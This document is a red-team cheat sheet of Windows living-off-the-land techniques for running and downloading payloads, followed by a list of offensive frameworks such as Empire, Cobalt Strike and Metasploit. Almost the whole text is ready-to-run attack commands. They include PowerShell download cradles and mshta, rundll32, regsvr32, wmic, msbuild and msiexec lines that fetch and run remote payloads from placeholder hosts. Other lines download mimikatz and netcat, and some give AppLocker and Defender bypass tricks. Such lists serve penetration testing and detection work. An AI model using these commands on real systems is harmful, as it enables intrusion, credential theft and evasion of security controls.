A curated list of tools and techniques written from experience in red teaming and weaponization of malware used in enterprise environments to trigger attacker exploitation code.
The methods outlined below are used to execute payloads on a local machine, hosted from a remote server or ran in memory.
Endless methods here, lots of obfuscation techniques, just test and choose one that works in your environment
- Infoke-Obfuscation Guide: Infamous Powershell obfuscator by Daniel Bohannon
- Invoke-CradleCrafter: Cradle obfuscator by Daniel Bohannon
- Powershell without Powershell.exe
- Powershell Download Cradles
Basic example to execute in memory:
powershell -nop -c IEX(New-Object Net.WebClient).DownloadString('https://Domain.com/Payload.ps1')
powershell -c IEX (IWR https://Domain.com/Payload.ps1')
Powershell from a WebDAV server:
powershell -exec bypass -f \\webdavserver\folder\payload.ps1
PowerLine - Compile EXE then transfer it to victim machine to execute Powershell commands without Powershell.exe. It has to be compiled with the scripts you wish to load within the config (i.e. PowerUp.ps1, Invoke-Mimikatz.ps1, etc.).
PowerLine.exe -ShowScripts
PowerLine.exe PowerUp "Invoke-AllChecks"
Microsoft binary to execute HTML Application (HTA) files or inline scripts. Frameworks like Empire, Metasploit and Unicorn all output HTA payload file formats.
1. mshta vbscript:Close(Execute("GetObject(""script:http://WebServer/payload.sct"")"))
2. mshta https://WebServer/payload.hta
3. mshta \\WebDAVserver\folder\payload.hta
Microsoft binary to execute code inside a .DLL file. Custom .DLLs can be written in languages such as Csharp to fully bypass detection.
rundll32 C:\yourfile.dll,EntryPoint
--> yourfile.dll is your malicious .DLL
--> EntryPoint is the function called within the .DLL
Run inline VBscript:
rundll32 vbscript:"\..\mshtml,RunHTMLApplication "+String(CreateObject("WScript.Shell").Run("Wscript.Echo ""Hi there!"""),0)
Run remote SCT payload:
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://WebServer/payload.sct");window.close();
Windows .NET executable for building and executing custom Csharp project files on the fly. Running local payload XML or Csproj files:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe Payload.xml
WebDAV server hosted to run in memory:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe \\WebDAVserver\Payload.xml
Windows command-line tool to register and unregister dll files. Can be used to bypass some controls such as AppLocker
Method 1: Web server delivery. Written on disk in IE local cache. Command to run on target machine:
regsvr32 /u /n /s /i:http://yourdomain.com/payload.sct scrobj.dll
Method 2: WebDAV server. Written on disk in WebDAV client local cache. Command to run on target machine:
regsvr32 /u /n /s /i:\\WebDavServer\tmp\payload.sct scrobj.dll
Use Wmic to execute a local or remote XSL (eXtensible Stylesheet Language) file which contains scripting
Execute local/remote file:
wmic os get /format:"https://yourdomain/payload.xsl"
Exeucte some command:
wmic process call create "cmd.exe /c shell.exe"
Both executables are part of the Windows Script Host (WSH) which is used for scripting capabilities. Cscript.exe allows for execution of VBS, JS, and WSH scripts entirely in command-line. Wscript.exe does the same pup pops up a Windows dialoge box for user interaction.
- Cscript app whitelisting bypass Cscript.exe methods:
1. Run locally
cscript.exe testscript.vbs
2. WebDav server
cscript //E:jscript \\WebDavServer\folder\payload.vbs
Windows comes with a Windows installer engine for MSI packages to install new apps called Msiexec.exe. Malicious .msi files can be created to execute payloads
msiexec /q /i http://YourDomain/payload.msi
The methods listed below are used to transfer and download remote files onto target machines.
Windows oneliners to download remote payload and execute arbitrary code
The most pervasive method these days which may be monitoried from blue team, logged for later analysis and possibly blocked in some environments.
# DownloadFile method
powershell -c (New-Object System.Net.WebClient).DownloadFile("https://example.com/archive.zip", "%temp%\archive.zip")
# Invoke-WebRequest method
powershell -c IWR "https://example.com/mimikatz.exe" -OutFile ".\mimikatz.exe"
# Wget in Powershell (Windows 8 and later)
PS# wget "http://www.yourdomain.com/file.exe" -outfile "OutputFile.exe"
Linux and Windows 10 (build #17063 and later) operating systems tool to bypass controls Reference: https://medium.com/@reegun/curl-exe-is-the-new-rundll32-exe-lolbin-3f79c5f35983
curl -o nc.exe https://yourdomain.com/nc.exe
Windows built-in binary for downloading remote files, encoding and decoding them. Blocked on recent builds of Windows 10 with Defender.
certutil -urlcache -f https://download.sysinternals.com/files/PSTools.env pstools.env
certutil -decode pstools.env pstools.zip
Windows command-line utility for managing BITS jobs and transferring files. Blocked by modern Windows 10 Defender but can be copied to another EXE to bypass.
Basic example:
bitsadmin /transfer job https://Domain.com/Payload.ps1 Payload.ps1
Method to bypass Win 10 Defender by copying "bitsadmin.exe" to a separate file for execution:
copy /Y C:\Windows\System32\bitsadmin.exe %temp%\Update.exe
%temp%\Update.exe /transfer newjob https://Domain.com/mimikatz.exe %temp%\mimikatz.exe
PowerShell method:
PS# Start-BitsTransfer https://Domain.com/mimikatz.exe %temp%\mimikatz.exe
- Veil Evasion: Generate Metasploit based payloads. Includes payload type and encoding options.
- Lucky Strike: PowerShell tool for creating malicious Macro documents.
- Shellter: Automated anti-virus evasion toolkit for payload development.
- Magic Unicorn: Python script by TrustedSec (Dave Kennedy) to generate Powershell commands and payloads as well as various file type payloads (HTA, Marcro, Certutil). It also accepts Cobalt Strike shellcode payloads in C#.
- Powershell Empire: Post-exploitation framework built in Powershell for setting up Listeners, receiving connecting Agents, executing payload Modules and more.
- Cobalt Strike: Red teaming framework of choice for many professionals. Costly but effective.
- Covanent: Open source framework from the makers of Cobalt Strike. Created in C# (.NET Core). Runs and interacts in a similar fashion to Powershell Empire.
- Metasploit: Standard Kali Linux framework, used by hackers, pentesters and script-kiddies alike.